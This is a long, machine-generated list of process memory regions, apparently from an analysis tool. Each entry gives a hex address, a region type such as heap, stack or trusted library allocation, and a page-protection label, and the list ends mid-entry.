7FF848E03000
trusted library allocation
page execute and read and write
19134C97000
trusted library allocation
page read and write
1B4E0000
heap
page read and write
1CEFF000
stack
page read and write
5A7D000
heap
page read and write
19131E50000
heap
page read and write
ACC0000
trusted library allocation
page read and write
254DB824000
heap
page read and write
12B81000
trusted library allocation
page read and write
29E1000
trusted library allocation
page read and write
1E864534000
heap
page read and write
1914C300000
heap
page read and write
540000
trusted library allocation
page read and write
25AE000
trusted library allocation
page read and write
1AC9A5B0000
heap
page read and write
2D00000
trusted library allocation
page read and write
264A50D0000
heap
page read and write
299C000
trusted library allocation
page read and write
1AF07000
heap
page read and write
13E9D9F1000
trusted library allocation
page read and write
146A000
trusted library allocation
page execute and read and write
139DF000
trusted library allocation
page read and write
2A16000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
1DC20000
trusted library section
page read and write
13EDE000
trusted library allocation
page read and write
530D000
trusted library allocation
page read and write
79C000
heap
page read and write
2CCA000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
214265B9000
heap
page read and write
7FF848F91000
trusted library allocation
page read and write
261222D0000
heap
page read and write
36F2000
trusted library allocation
page read and write
2AE9000
trusted library allocation
page read and write
128E1000
trusted library allocation
page read and write
13EA5C04000
heap
page read and write
2E26000
trusted library allocation
page read and write
13E8DF4D000
trusted library allocation
page read and write
AE1F000
trusted library allocation
page read and write
1300000
heap
page read and write
2698000
trusted library allocation
page read and write
13E8BBC7000
heap
page execute and read and write
7FF848FE0000
trusted library allocation
page read and write
7FF849114000
trusted library allocation
page read and write
2F6F000
trusted library allocation
page read and write
7FF849075000
trusted library allocation
page read and write
C10995D000
stack
page read and write
3588000
trusted library allocation
page read and write
D8545F9000
stack
page read and write
2B12000
trusted library allocation
page read and write
2EE2000
trusted library allocation
page read and write
29A096A0000
trusted library allocation
page read and write
29C5000
trusted library allocation
page read and write
1BCB4000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
2870000
heap
page execute and read and write
1914BD60000
heap
page read and write
2966000
trusted library allocation
page read and write
4ED1000
trusted library allocation
page read and write
1CC40000
trusted library section
page read and write
1CF05E90000
heap
page read and write
27B4000
trusted library allocation
page read and write
5C90000
heap
page read and write
91AF000
stack
page read and write
2F63000
trusted library allocation
page read and write
36D6000
trusted library allocation
page read and write
13B4000
heap
page read and write
2F5F000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
7FF848E34000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
5CD000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
273577B0000
heap
page read and write
273577E0000
heap
page read and write
1914BD95000
heap
page read and write
29A08020000
heap
page read and write
53DE000
stack
page read and write
7700000
trusted library allocation
page read and write
3923D78000
stack
page read and write
7FF849140000
trusted library allocation
page read and write
1B6FD000
heap
page read and write
1220000
heap
page read and write
344F000
trusted library allocation
page read and write
7FF848E04000
trusted library allocation
page read and write
29A09B60000
heap
page execute and read and write
191336E0000
trusted library allocation
page read and write
13993000
trusted library allocation
page read and write
14FB000
trusted library allocation
page execute and read and write
7FF848E0D000
trusted library allocation
page execute and read and write
7FF848E3D000
trusted library allocation
page execute and read and write
273577E8000
heap
page read and write
C30000
heap
page read and write
EF2000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
15CBEA55000
heap
page read and write
3498000
trusted library allocation
page read and write
28736970000
heap
page read and write
9D2E000
heap
page read and write
1EC38101000
heap
page read and write
1C611403000
heap
page read and write
302D000
trusted library allocation
page read and write
802000
heap
page read and write
29A22005000
heap
page read and write
E93E000
stack
page read and write
6030000
heap
page read and write
29F6000
trusted library allocation
page read and write
2D81000
trusted library allocation
page read and write
9CF6000
heap
page read and write
59F000
heap
page read and write
700000
heap
page read and write
AC00000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
46D5000
trusted library allocation
page read and write
3438000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
B44000
unkown
page execute and read and write
16C2A5D8000
heap
page read and write
15CBE700000
heap
page read and write
7FF849004000
trusted library allocation
page read and write
34B5000
trusted library allocation
page read and write
EBBD000
stack
page read and write
58C000
heap
page read and write
128F0980000
heap
page read and write
2EA6000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
2E39000
trusted library allocation
page read and write
1C00E000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
2E5E000
stack
page read and write
267B000
trusted library allocation
page read and write
2BDD000
trusted library allocation
page read and write
15CC12EA000
trusted library allocation
page read and write
2FFA000
trusted library allocation
page read and write
15CBE9C2000
trusted library allocation
page read and write
39239FF000
stack
page read and write
2696000
trusted library allocation
page read and write
54EE000
stack
page read and write
5A17000
heap
page read and write
2685000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
ED0000
heap
page read and write
EB5D000
stack
page read and write
9D29000
heap
page read and write
19131D65000
heap
page read and write
26122420000
heap
page read and write
EE3D000
stack
page read and write
B09000
heap
page read and write
1495000
heap
page read and write
1560000
heap
page read and write
29A19F09000
trusted library allocation
page read and write
2921000
trusted library allocation
page read and write
306E000
stack
page read and write
1E8643E0000
heap
page read and write
1B60D000
stack
page read and write
B3B16FC000
stack
page read and write
7FF849150000
trusted library allocation
page read and write
328A000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
3463000
trusted library allocation
page read and write
19134C94000
trusted library allocation
page read and write
5A3E000
heap
page read and write
1D5D8A60000
heap
page read and write
1C57BA06000
heap
page read and write
5BF0000
heap
page read and write
1B6B8000
heap
page read and write
31F3000
trusted library allocation
page read and write
28A6000
trusted library allocation
page read and write
145D000
trusted library allocation
page execute and read and write
1B84E000
stack
page read and write
1BB03000
heap
page execute and read and write
C9BE000
stack
page read and write
E3CD000
stack
page read and write
2EF5000
trusted library allocation
page read and write
780000
heap
page read and write
64CE000
stack
page read and write
566000
heap
page read and write
31FA000
trusted library allocation
page read and write
7C5000
heap
page read and write
19133889000
heap
page read and write
1E8644E0000
heap
page read and write
1B170000
trusted library allocation
page read and write
2662000
trusted library allocation
page read and write
29A08050000
heap
page read and write
326F000
trusted library allocation
page read and write
2E53000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
19134817000
trusted library allocation
page read and write
29A07CB6000
heap
page read and write
2687000
trusted library allocation
page read and write
29A07C50000
heap
page read and write
F3FE000
stack
page read and write
2957000
trusted library allocation
page read and write
6270000
heap
page execute and read and write
99FCFD000
stack
page read and write
3148000
trusted library allocation
page read and write
AE31000
trusted library section
page read and write
1225000
heap
page read and write
1914BDC6000
heap
page read and write
1A7AAED0000
heap
page read and write
15CD871B000
heap
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
7FF848EB0000
trusted library allocation
page execute and read and write
13E8B945000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
300D000
trusted library allocation
page read and write
19131DC9000
heap
page read and write
19133800000
heap
page execute and read and write
2693000
trusted library allocation
page read and write
B570000
trusted library allocation
page read and write
CABF000
stack
page read and write
8F6E000
stack
page read and write
5174000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
E14D000
stack
page read and write
19134E04000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1CF07900000
heap
page read and write
25AA000
trusted library allocation
page read and write
99FF78000
stack
page read and write
680000
unkown
page readonly
7FF848FC7000
trusted library allocation
page read and write
16C0000
heap
page read and write
90AE000
stack
page read and write
14F7000
trusted library allocation
page execute and read and write
1BEBC000
stack
page read and write
3005000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
7FF848E20000
trusted library allocation
page read and write
2651000
trusted library allocation
page read and write
352A000
trusted library allocation
page read and write
1D000000
trusted library section
page read and write
EB6000
heap
page read and write
29A21F8F000
heap
page read and write
27357790000
heap
page read and write
28736660000
heap
page read and write
FF0000
heap
page read and write
2787E35B000
heap
page read and write
1C6113C0000
heap
page read and write
13957000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page execute and read and write
7FF848EA6000
trusted library allocation
page read and write
29A19DC7000
trusted library allocation
page read and write
36E9000
trusted library allocation
page read and write
15CBE7C6000
heap
page read and write
7FF848FD2000
trusted library allocation
page read and write
1180000
heap
page read and write
2F1E000
trusted library allocation
page read and write
2EF5000
trusted library allocation
page read and write
2D75000
trusted library allocation
page read and write
13E8BBC0000
heap
page execute and read and write
7FF848E14000
trusted library allocation
page read and write
15CBE990000
trusted library allocation
page read and write
2FCC000
trusted library allocation
page read and write
31D2000
trusted library allocation
page read and write
19143EBF000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
2BD8000
trusted library allocation
page read and write
34EE000
trusted library allocation
page read and write
5176000
trusted library allocation
page read and write
7FF848EBC000
trusted library allocation
page execute and read and write
4D0000
heap
page read and write
13A87000
trusted library allocation
page read and write
7FF849118000
trusted library allocation
page read and write
1C57BD80000
heap
page read and write
284E000
stack
page read and write
7FF849024000
trusted library allocation
page read and write
C109C7F000
stack
page read and write
15CBE7C4000
heap
page read and write
D39000
heap
page read and write
356A000
trusted library allocation
page read and write
128F0A40000
heap
page read and write
13EA5BFC000
heap
page read and write
29A7000
trusted library allocation
page read and write
15CD8785000
heap
page read and write
315C000
trusted library allocation
page read and write
356E000
trusted library allocation
page read and write
13E8BA39000
heap
page read and write
3520000
trusted library allocation
page read and write
1FB65F9000
stack
page read and write
2E3B000
trusted library allocation
page read and write
293D000
trusted library allocation
page read and write
2F5B000
trusted library allocation
page read and write
7612398000
stack
page read and write
B866000
heap
page read and write
7F823FE000
stack
page read and write
2F1B000
trusted library allocation
page read and write
2EC4000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
2816000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
4F4A67F000
stack
page read and write
2AB9000
trusted library allocation
page read and write
1FB647E000
stack
page read and write
7FF848E96000
trusted library allocation
page read and write
D90000
heap
page read and write
5CB000
heap
page read and write
56D0000
heap
page execute and read and write
7FF848EA0000
trusted library allocation
page read and write
1C611417000
heap
page read and write
3649000
trusted library allocation
page read and write
2B01000
trusted library allocation
page read and write
264A5100000
heap
page read and write
552E000
stack
page read and write
1A7AAC28000
heap
page read and write
29A19D61000
trusted library allocation
page read and write
34D9000
trusted library allocation
page read and write
2F7D000
trusted library allocation
page read and write
2AC4000
trusted library allocation
page read and write
28BB000
trusted library allocation
page read and write
30AC000
trusted library allocation
page read and write
2E135890000
heap
page read and write
19134FD7000
trusted library allocation
page read and write
264A50E0000
heap
page read and write
2CA5000
trusted library allocation
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
A74000
heap
page read and write
349E000
trusted library allocation
page read and write
15CBE77D000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
2EA7000
trusted library allocation
page read and write
2A25000
trusted library allocation
page read and write
2FAB000
trusted library allocation
page read and write
383B000
trusted library allocation
page read and write
3542000
trusted library allocation
page read and write
324E000
trusted library allocation
page read and write
ED5000
heap
page read and write
29A096D0000
heap
page read and write
299E000
trusted library allocation
page read and write
2987000
trusted library allocation
page read and write
4C8E000
stack
page read and write
3542000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
352E000
trusted library allocation
page read and write
2F06000
trusted library allocation
page read and write
7FF848E23000
trusted library allocation
page read and write
76127FE000
stack
page read and write
1130000
trusted library allocation
page execute and read and write
B9D0000
heap
page read and write
2684000
trusted library allocation
page read and write
E70000
heap
page read and write
52E0000
trusted library allocation
page read and write
36CB000
trusted library allocation
page read and write
26122170000
heap
page read and write
3487000
trusted library allocation
page read and write
1E8644C0000
heap
page read and write
1E0000
heap
page read and write
17E84FF000
stack
page read and write
19131D30000
heap
page read and write
2B3B000
trusted library allocation
page read and write
1B6CD000
stack
page read and write
3923A7F000
stack
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
7FF849150000
trusted library allocation
page read and write
3484000
trusted library allocation
page read and write
7FF848E3B000
trusted library allocation
page execute and read and write
D853F3D000
stack
page read and write
7FF848E6C000
trusted library allocation
page execute and read and write
13E9D9E1000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
C74E000
heap
page read and write
1443000
trusted library allocation
page execute and read and write
7FF848FD8000
trusted library allocation
page read and write
2D85000
trusted library allocation
page read and write
FE545DF000
stack
page read and write
10D6000
heap
page read and write
1FB62FF000
stack
page read and write
3461000
trusted library allocation
page read and write
F9E000
stack
page read and write
25A6000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
2763000
trusted library allocation
page read and write
4EB6000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
367D000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
1CFFE000
stack
page read and write
264A50D4000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
7AED000
stack
page read and write
7FF848F80000
trusted library allocation
page read and write
9AED000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
1D5D7080000
heap
page read and write
13EAF000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
D3E000
stack
page read and write
EDB000
heap
page read and write
52EB000
trusted library allocation
page read and write
1914BCE4000
heap
page read and write
CBAD000
stack
page read and write
254DB6E0000
heap
page read and write
7FF8490DF000
trusted library allocation
page read and write
3011000
trusted library allocation
page read and write
E708000
stack
page read and write
5463000
heap
page read and write
7FF848DE4000
trusted library allocation
page read and write
36E3000
trusted library allocation
page read and write
17CF000
stack
page read and write
7FF8491B0000
trusted library allocation
page read and write
264A511E000
heap
page read and write
1B22B000
heap
page read and write
3045000
trusted library allocation
page read and write
3C11000
trusted library allocation
page read and write
1C94E000
stack
page read and write
1BB00000
heap
page execute and read and write
E24E000
stack
page read and write
2EC0000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
7FF848DE2000
trusted library allocation
page read and write
29B6000
trusted library allocation
page read and write
500E000
stack
page read and write
29D2000
trusted library allocation
page read and write
3018000
trusted library allocation
page read and write
13E8B998000
heap
page read and write
1C6113C5000
heap
page read and write
28736974000
heap
page read and write
29A19D51000
trusted library allocation
page read and write
2953000
trusted library allocation
page read and write
1FB744B000
stack
page read and write
19131E90000
trusted library allocation
page read and write
3035000
trusted library allocation
page read and write
19134E1E000
trusted library allocation
page read and write
1FB6677000
stack
page read and write
112E000
stack
page read and write
2D51000
trusted library allocation
page read and write
29A07CF0000
heap
page read and write
1B94E000
stack
page read and write
1C57BA00000
heap
page read and write
384E000
trusted library allocation
page read and write
10CB000
trusted library allocation
page execute and read and write
2A2D000
trusted library allocation
page read and write
4EB4000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
25E1000
trusted library allocation
page read and write
273A000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
FA0000
heap
page read and write
13E8E36D000
trusted library allocation
page read and write
3559000
trusted library allocation
page read and write
29A0AD6B000
trusted library allocation
page read and write
E89000
stack
page read and write
32F5000
trusted library allocation
page read and write
10AD000
stack
page read and write
3524000
trusted library allocation
page read and write
2E24000
trusted library allocation
page read and write
2ACB000
trusted library allocation
page read and write
1D150000
stack
page read and write
D853EB2000
stack
page read and write
21A2E480000
heap
page read and write
2E8D000
trusted library allocation
page read and write
125E3000
trusted library allocation
page read and write
5306000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
3098000
trusted library allocation
page read and write
25DB000
trusted library allocation
page read and write
1B706000
heap
page read and write
15CD8870000
heap
page read and write
58B2000
heap
page read and write
7FF848E03000
trusted library allocation
page read and write
99FE7D000
stack
page read and write
D8552CE000
stack
page read and write
7FF849170000
trusted library allocation
page read and write
280F000
trusted library allocation
page read and write
2EC2000
trusted library allocation
page read and write
1BAB4000
heap
page read and write
2CF7A2A0000
heap
page read and write
138F000
stack
page read and write
605F000
heap
page read and write
34D5000
trusted library allocation
page read and write
1AD7C000
heap
page read and write
761267F000
stack
page read and write
2F69000
trusted library allocation
page read and write
2686000
trusted library allocation
page read and write
AC96000
trusted library allocation
page read and write
1B573000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
287D000
trusted library allocation
page read and write
2E7D000
trusted library allocation
page read and write
12EE000
stack
page read and write
34AD000
trusted library allocation
page read and write
2F83000
trusted library allocation
page read and write
7FF848E09000
trusted library allocation
page read and write
15CC15FE000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page execute and read and write
FA0000
heap
page read and write
2682000
trusted library allocation
page read and write
29A07D38000
heap
page read and write
1540000
heap
page read and write
E20000
heap
page read and write
1258000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
393CDFE000
stack
page read and write
EBD000
trusted library allocation
page execute and read and write
7FF848F92000
trusted library allocation
page read and write
19143C44000
trusted library allocation
page read and write
12B83000
trusted library allocation
page read and write
7FF848F82000
trusted library allocation
page read and write
3489000
trusted library allocation
page read and write
AC0000
heap
page read and write
3226000
trusted library allocation
page read and write
13EA5AB3000
heap
page read and write
2AF2000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
322E000
trusted library allocation
page read and write
2CBDFF20000
heap
page read and write
9E0000
heap
page read and write
ACA2000
trusted library allocation
page read and write
13E8B8C0000
heap
page read and write
2D69000
trusted library allocation
page read and write
350000
unkown
page readonly
323F000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
B894000
heap
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
1A7AAC20000
heap
page read and write
2B6C000
stack
page read and write
1CA4F000
stack
page read and write
2983000
trusted library allocation
page read and write
1E864530000
heap
page read and write
3557000
trusted library allocation
page read and write
354D000
trusted library allocation
page read and write
2603000
trusted library allocation
page read and write
15CC153A000
trusted library allocation
page read and write
1CF07904000
heap
page read and write
9F0000
heap
page read and write
2F97000
trusted library allocation
page read and write
2A2C000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
3830000
trusted library allocation
page read and write
288D000
trusted library allocation
page read and write
1B58A000
heap
page read and write
2EA0000
trusted library allocation
page read and write
9A00FF000
stack
page read and write
21426530000
heap
page read and write
25DE000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
76126FF000
stack
page read and write
1520000
trusted library allocation
page execute and read and write
264A6B30000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
2EBF000
stack
page read and write
9D15000
heap
page read and write
9CF0000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
AAD000
heap
page read and write
2AF9000
trusted library allocation
page read and write
34BE000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
19131EB0000
trusted library allocation
page read and write
275C000
trusted library allocation
page read and write
8D7000
unkown
page execute and read and write
3923C77000
stack
page read and write
30000
unkown
page readonly
3383000
trusted library allocation
page read and write
AC6F000
stack
page read and write
2906000
trusted library allocation
page read and write
214265BC000
heap
page read and write
33C6000
trusted library allocation
page read and write
5301000
trusted library allocation
page read and write
2EBF000
trusted library allocation
page read and write
1510000
trusted library allocation
page read and write
1B226000
heap
page read and write
3923AFE000
stack
page read and write
4F00000
trusted library allocation
page read and write
25DF000
trusted library allocation
page read and write
15CBE940000
heap
page readonly
8BEE000
stack
page read and write
F80000
heap
page read and write
29A21E50000
heap
page read and write
1A7AAC40000
heap
page read and write
2ED1000
trusted library allocation
page read and write
1CF05E98000
heap
page read and write
5A10000
heap
page read and write
2B6C000
trusted library allocation
page read and write
2E4A000
trusted library allocation
page read and write
15CBE6A0000
heap
page read and write
EB0000
trusted library allocation
page read and write
2787E6A0000
heap
page read and write
99F9DE000
stack
page read and write
2E83000
trusted library allocation
page read and write
2666000
trusted library allocation
page read and write
10E0000
trusted library allocation
page read and write
8CED000
stack
page read and write
1B290000
heap
page execute and read and write
1199000
heap
page read and write
10C0000
trusted library allocation
page read and write
3514000
trusted library allocation
page read and write
34C1000
trusted library allocation
page read and write
139BF000
trusted library allocation
page read and write
2DA6000
trusted library allocation
page read and write
D20000
heap
page read and write
322D000
trusted library allocation
page read and write
2EB5000
trusted library allocation
page read and write
3314000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
264A5108000
heap
page read and write
29A07D10000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
54AC000
stack
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
CD27000
stack
page read and write
2BD458C5000
heap
page read and write
D4E000
stack
page read and write
327B000
trusted library allocation
page read and write
8F2F000
stack
page read and write
9CF9000
heap
page read and write
1AC9A6F0000
heap
page read and write
13A4E000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
1B6EE000
stack
page read and write
AA40000
heap
page read and write
2C05000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
7DEC000
stack
page read and write
AB6E000
stack
page read and write
B845000
heap
page read and write
B55000
heap
page read and write
5170000
trusted library allocation
page read and write
1CB4A000
stack
page read and write
36DE000
trusted library allocation
page read and write
25CE000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
AE89000
heap
page read and write
85A217F000
stack
page read and write
33AE000
trusted library allocation
page read and write
2B29000
trusted library allocation
page read and write
13E8BB82000
trusted library allocation
page read and write
13EA5C54000
heap
page read and write
3E71000
trusted library allocation
page read and write
15CD8970000
heap
page read and write
7FF8490AF000
trusted library allocation
page read and write
2657000
trusted library allocation
page read and write
7FF8491A0000
trusted library allocation
page execute and read and write
264A50A0000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
3599000
trusted library allocation
page read and write
326C000
trusted library allocation
page read and write
2CBDFF26000
heap
page read and write
33D2000
trusted library allocation
page read and write
7FF8490B3000
trusted library allocation
page read and write
2919000
trusted library allocation
page read and write
1B214000
heap
page read and write
2F75000
trusted library allocation
page read and write
31EB000
trusted library allocation
page read and write
7FF848FE9000
trusted library allocation
page read and write
CD8000
heap
page read and write
2F7B000
trusted library allocation
page read and write
36F4000
trusted library allocation
page read and write
8CE000
stack
page read and write
9CF4000
heap
page read and write
2E3F000
trusted library allocation
page read and write
9A0D4B000
stack
page read and write
A5F000
stack
page read and write
30B8000
trusted library allocation
page read and write
2FAF000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
99FFFE000
stack
page read and write
2F0D000
trusted library allocation
page read and write
9A017E000
stack
page read and write
126E000
heap
page read and write
1294A000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
265A000
trusted library allocation
page read and write
39249CE000
stack
page read and write
316C000
trusted library allocation
page read and write
7FF8491A0000
trusted library allocation
page read and write
15CBEA50000
heap
page read and write
ACE0000
trusted library allocation
page read and write
34F4000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page execute and read and write
CDB0000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
1EC37FF0000
heap
page read and write
2811000
trusted library allocation
page read and write
1B1D1000
heap
page read and write
34A9000
trusted library allocation
page read and write
B5B0000
heap
page read and write
2E50000
trusted library allocation
page read and write
2658000
trusted library allocation
page read and write
5A36000
heap
page read and write
13E8E742000
trusted library allocation
page read and write
CF7000
stack
page read and write
2EC9000
trusted library allocation
page read and write
2B64000
trusted library allocation
page read and write
5460000
heap
page read and write
2CB1000
trusted library allocation
page read and write
30C9000
trusted library allocation
page read and write
7FF8491B0000
trusted library allocation
page read and write
ECD000
trusted library allocation
page execute and read and write
3535000
trusted library allocation
page read and write
11AE000
stack
page read and write
B825000
heap
page read and write
1FB5FA3000
stack
page read and write
19134691000
trusted library allocation
page read and write
14F5000
trusted library allocation
page execute and read and write
7FF848EC0000
trusted library allocation
page read and write
344B000
trusted library allocation
page read and write
D50000
heap
page read and write
128F0890000
heap
page read and write
34CA000
trusted library allocation
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
2F0E000
trusted library allocation
page read and write
13E8B967000
heap
page read and write
1AD73000
heap
page read and write
33EB000
trusted library allocation
page read and write
2D48000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
1AC45000
heap
page read and write
2D38000
trusted library allocation
page read and write
2908000
trusted library allocation
page read and write
ACB0000
trusted library allocation
page read and write
55C0000
heap
page read and write
2301000
trusted library allocation
page read and write
58A000
heap
page read and write
327D000
trusted library allocation
page read and write
15CC12E6000
trusted library allocation
page read and write
10AE000
stack
page read and write
CEF000
heap
page read and write
29A09D51000
trusted library allocation
page read and write
1450000
heap
page read and write
D8544F9000
stack
page read and write
5340000
heap
page execute and read and write
64C11FF000
stack
page read and write
2642000
trusted library allocation
page read and write
325D000
trusted library allocation
page read and write
1A8AC3E0000
heap
page read and write
2C03000
trusted library allocation
page read and write
29A21FC4000
heap
page read and write
36E1000
trusted library allocation
page read and write
2EE4000
trusted library allocation
page read and write
7FF848FAA000
trusted library allocation
page read and write
2F79000
trusted library allocation
page read and write
682000
unkown
page readonly
2B90000
trusted library allocation
page read and write
972C000
stack
page read and write
1657A6D4000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
940000
heap
page execute and read and write
7FF848FD7000
trusted library allocation
page read and write
29C9000
trusted library allocation
page read and write
DBA000
heap
page read and write
31FB000
trusted library allocation
page read and write
2CAD000
trusted library allocation
page read and write
7FF8491A0000
trusted library allocation
page read and write
3029000
trusted library allocation
page read and write
1A8AC1E1000
heap
page read and write
19133884000
heap
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
34E6000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
AD10000
trusted library allocation
page execute and read and write
5DA0000
trusted library allocation
page read and write
147B000
trusted library allocation
page execute and read and write
28C7000
trusted library allocation
page read and write
15CC1787000
trusted library allocation
page read and write
C1099DF000
stack
page read and write
7FF849160000
trusted library allocation
page read and write
254DB537000
heap
page read and write
DC7000
heap
page read and write
1427000
heap
page read and write
53E0000
trusted library allocation
page read and write
A9CE000
stack
page read and write
1C57BA14000
heap
page read and write
1DCDD000
stack
page read and write
2757000
trusted library allocation
page read and write
3702000
trusted library allocation
page read and write
3467000
trusted library allocation
page read and write
19133887000
heap
page read and write
29D6000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
3476000
trusted library allocation
page read and write
85D000
heap
page read and write
15CBE7C9000
heap
page read and write
117E000
stack
page read and write
FFDB0000
trusted library allocation
page execute and read and write
350A000
trusted library allocation
page read and write
5A2A000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
21A2E460000
heap
page read and write
314C000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1B48E000
stack
page read and write
F1DC000
heap
page read and write
1EC380E8000
heap
page read and write
13E9DB9A000
trusted library allocation
page read and write
2A3C000
trusted library allocation
page read and write
D854678000
stack
page read and write
2CF7A2C0000
heap
page read and write
34D6000
trusted library allocation
page read and write
31ED000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
2867000
trusted library allocation
page read and write
E50E000
stack
page read and write
1BBEA000
heap
page read and write
3549000
trusted library allocation
page read and write
26B9000
trusted library allocation
page read and write
1C611330000
heap
page read and write
648D000
stack
page read and write
27B7000
trusted library allocation
page read and write
1B110000
heap
page read and write
FDF000
stack
page read and write
E28E000
stack
page read and write
AA00000
trusted library allocation
page execute and read and write
7FF848F10000
trusted library allocation
page execute and read and write
36D4000
trusted library allocation
page read and write
2F51000
trusted library allocation
page read and write
1CF05E20000
heap
page read and write
3140000
trusted library allocation
page read and write
1BCB8000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
4EF4000
trusted library allocation
page read and write
1440000
trusted library allocation
page read and write
13EA5C0F000
heap
page read and write
12307000
trusted library allocation
page read and write
7FF849004000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
2CF7A369000
heap
page read and write
F53E000
stack
page read and write
282E000
trusted library allocation
page read and write
303D000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page read and write
42000
unkown
page readonly
27D3000
trusted library allocation
page read and write
AA50000
trusted library allocation
page execute and read and write
7FF849100000
trusted library allocation
page read and write
13DC000
stack
page read and write
3517000
trusted library allocation
page read and write
EF6000
heap
page read and write
1BA10000
heap
page read and write
AC70000
trusted library allocation
page read and write
12B5000
heap
page read and write
1CF078B0000
heap
page read and write
CC2C000
stack
page read and write
1D130000
heap
page read and write
2F00000
trusted library section
page read and write
C41A7FB000
stack
page read and write
2959000
trusted library allocation
page read and write
2B14000
trusted library allocation
page read and write
30C1000
trusted library allocation
page read and write
560000
heap
page read and write
33C2000
trusted library allocation
page read and write
28CD000
trusted library allocation
page read and write
B1AB000
stack
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
2A27000
trusted library allocation
page read and write
AD22000
heap
page read and write
5A6E000
heap
page read and write
2761000
trusted library allocation
page read and write
29A9000
trusted library allocation
page read and write
2626000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
10C7000
trusted library allocation
page execute and read and write
FB205FF000
stack
page read and write
1BCBF000
stack
page read and write
15CC0770000
trusted library allocation
page read and write
36E7000
trusted library allocation
page read and write
125E8000
trusted library allocation
page read and write
356E000
trusted library allocation
page read and write
761287E000
stack
page read and write
29A21F50000
heap
page read and write
2EB2000
trusted library allocation
page read and write
1B634000
heap
page read and write
AC8E000
trusted library allocation
page read and write
266F000
trusted library allocation
page read and write
B7D0000
heap
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
2F24000
trusted library allocation
page read and write
2D8D000
trusted library allocation
page read and write
17E847B000
stack
page read and write
2BD43DF0000
heap
page read and write
27C0000
heap
page execute and read and write
2BEF000
trusted library allocation
page read and write
15CBE690000
heap
page read and write
2787E6A5000
heap
page read and write
5DD0000
trusted library allocation
page execute and read and write
191337D0000
heap
page execute and read and write
35CE000
trusted library allocation
page read and write
1EC38200000
heap
page read and write
2787E6A4000
heap
page read and write
2787E387000
heap
page read and write
15CC05C2000
trusted library allocation
page read and write
5325000
